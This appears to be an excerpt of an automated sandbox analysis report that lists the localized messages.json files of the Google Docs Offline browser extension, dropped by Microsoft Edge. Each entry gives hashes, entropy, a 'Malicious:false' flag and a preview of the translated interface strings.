                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                  MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                  SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                  SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                  SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                  MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                  SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                  SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                  SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                  MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                  SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                  SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                  SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                  MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                  SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                  SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                  SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                  MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                  SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                  SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                  SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                  MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                  SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                  SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                  SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                  MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                  SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                  SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                  SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                  MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                  SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                  SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                  SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                  MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                  SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                  SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                  SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                  MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                  SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                  SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                  SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                  MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                  SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                  SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                  SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                  MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                  SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                  SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                  SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                  Malicious:false
